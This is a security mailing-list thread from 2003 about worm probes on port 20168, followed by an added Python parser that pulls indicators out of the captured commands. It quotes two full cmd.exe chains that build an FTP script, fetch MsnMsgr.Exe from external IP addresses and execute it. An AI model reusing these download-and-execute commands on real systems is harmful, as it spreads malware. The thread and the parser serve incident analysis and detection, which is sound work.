Security Incidents mailing list archives

FW: New Worm or Worm Variant?


From: "Bassett, Mark" <mbassett () omaha com>
Date: Thu, 11 Dec 2003 12:22:02 -0600


Looks to me like it's building the wxtu.dll after it initializes the
connection.

And then it uses that built file as a command input to ftp.
So it's doing ftp -n
 
With input from wxtu.dll which is below

open 211.26.130.118
USER noxe
Noxe
Binary
Get MsnMsgr.exe
bye

So it is just a simple ftp script to download an exploit.

Mark Bassett
Network Administrator
World media company
Omaha.com
402-898-2079


-----Original Message-----
From: Charles Hamby [mailto:fixer () gci net] 
Sent: Wednesday, December 10, 2003 1:36 PM
To: incidents () securityfocus com
Subject: New Worm or Worm Variant?

I've been seeing a jump in 20168/tcp scans over the past week or so.
This port is commonly associated with the Lovegate worm.  I recently set
up a port listener using Netcat to capture 
any output from probes against a couple of my systems.  Shown below are
the results:

echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo
noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >>
wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll &
start MsnMsgr.Exe

echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo
noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >>
wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll &
start MsnMsgr.Exe

At first glance it looks like some sort of non-interactive FTP session
to download an exploit (MsnMsgr.Exe), but Googling for wxtu.dll came up
empty (so this could be anything from a real .dll to a renamed
executable in my mind).  A couple of questions for the world at large:

1) Has anyone run across anything like this before?  This looks like
something automated to me.  Worm script, perhaps.  The IP I set up the
port listener on had roughly 20+ probes on 20168/tcp from noon yesterday
to 7am this morning.

2) Any theories on wxtu.dll?  Since I can't get a hold of the malware to
analyze it, I'm really guessing at this point.  MsnMsgr.Exe seems to be
the exploit itself; it appears to be using something like FTPCOM to
do a non-interactive FTP session, but wxtu.dll could be anything from a
real .dll file to a renamed executable.  Ideas?

-cdh
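The command chains Charles captured, parsed the way a responder would when triaging listener output. This is an added Python example, not code from either poster; it assumes the cmd.exe reading Mark gives above (each `echo ... >> file` appends a line to the file, `ftp -n -s:file` then runs that file as an FTP script, and the following `del`/`start` clean up and execute the download). The sample input below is constructed from the two payloads quoted in the post.

```python
"""Reconstruct the FTP script built by an 'echo >> file & ftp -s:file' chain
and extract the indicators a responder wants (host, credentials, file).
Added example, not part of the original thread."""

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: the two payloads quoted in the post, one per line.
CAPTURED_PAYLOADS = [
    "echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo "
    "noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> "
    "wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & "
    "start MsnMsgr.Exe",
    "echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo "
    "noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> "
    "wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & "
    "start MsnMsgr.Exe",
]

ECHO_APPEND = re.compile(r"^echo\s+(?P<text>.*?)\s*>>\s*(?P<file>\S+)$", re.I)
FTP_CMD = re.compile(r"^ftp\b(?P<args>.*)$", re.I)
DEL_CMD = re.compile(r"^del\s+(?P<file>\S+)$", re.I)
START_CMD = re.compile(r"^start\s+(?P<file>\S+)$", re.I)


@dataclass
class Findings:
    scripts: dict = field(default_factory=dict)   # file -> lines appended via echo >>
    ftp_script: Optional[str] = None              # file handed to ftp -s:
    ftp_no_autologin: bool = False                # ftp -n seen
    deleted: list = field(default_factory=list)
    started: list = field(default_factory=list)
    host: Optional[str] = None
    user: Optional[str] = None
    password: Optional[str] = None
    downloads: list = field(default_factory=list)


def split_chain(cmdline: str) -> list:
    # cmd.exe runs '&'-separated commands unconditionally, left to right.
    # ('&&' would yield an empty segment here, which is simply dropped.)
    return [seg.strip() for seg in cmdline.split("&") if seg.strip()]


def reconstruct(cmdline: str) -> Findings:
    f = Findings()
    for seg in split_chain(cmdline):
        if m := ECHO_APPEND.match(seg):
            f.scripts.setdefault(m["file"].lower(), []).append(m["text"])
        elif m := FTP_CMD.match(seg):
            args = m["args"].split()
            f.ftp_no_autologin = "-n" in args
            for a in args:
                if a.lower().startswith("-s:"):
                    f.ftp_script = a[3:].lower()
        elif m := DEL_CMD.match(seg):
            f.deleted.append(m["file"].lower())
        elif m := START_CMD.match(seg):
            f.started.append(m["file"].lower())

    # Interpret the script ftp.exe was told to run, line by line.
    lines = f.scripts.get(f.ftp_script, []) if f.ftp_script else []
    i = 0
    while i < len(lines):
        tok = lines[i].split()
        verb = tok[0].lower() if tok else ""
        if verb == "open" and len(tok) > 1:
            f.host = tok[1]
        elif verb == "user" and len(tok) > 1:
            f.user = tok[1]
            # With -n there is no auto-login, so 'USER name' prompts for a
            # password and the next script line answers that prompt.
            if len(tok) > 2:
                f.password = tok[2]
            elif i + 1 < len(lines):
                f.password = lines[i + 1].strip()
                i += 1
        elif verb in ("get", "recv") and len(tok) > 1:
            f.downloads.append(tok[1])
        i += 1
    return f


def is_ftp_dropper(f: Findings) -> bool:
    """True when an echo-built script is fed to ftp -s: and a file it
    fetched is then started: the build/fetch/execute pattern in the post."""
    built = f.ftp_script is not None and f.ftp_script in f.scripts
    fetched = {d.lower() for d in f.downloads}
    return built and any(s in fetched for s in f.started)


if __name__ == "__main__":
    for payload in CAPTURED_PAYLOADS:
        r = reconstruct(payload)
        print(f"dropper={is_ftp_dropper(r)} host={r.host} user={r.user} "
              f"get={r.downloads} script={r.ftp_script} started={r.started}")
```

Run as-is it prints one line per captured payload; the host is the only field that differs between the two probes, which is what makes the rest (same script name, same credentials, same payload name) useful as a signature when correlating other captures.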


